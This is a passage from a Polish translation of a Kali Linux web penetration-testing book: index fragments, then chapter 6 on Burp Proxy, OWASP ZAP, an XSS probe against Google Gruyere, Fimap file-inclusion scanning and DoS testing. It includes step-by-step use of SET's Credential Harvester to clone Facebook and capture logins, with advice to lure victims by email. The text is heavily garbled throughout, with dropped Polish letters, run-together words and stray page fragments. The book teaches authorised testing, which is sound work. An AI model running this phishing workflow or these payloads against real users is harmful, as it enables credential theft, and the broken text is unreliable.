usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 14: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

237

Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej

1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego

4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera

W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

238

BURP Proxy

BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew

Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da

Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite

Na ekranie pojawi si g oacutewne okno pakietu Burp Suite

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

239

Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia

Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy

Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

240

W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej

Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox

Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

241

jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie

Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania

Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)

Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku

Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)

Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

242

Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

243

Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter

Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza

Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie

Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom

Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

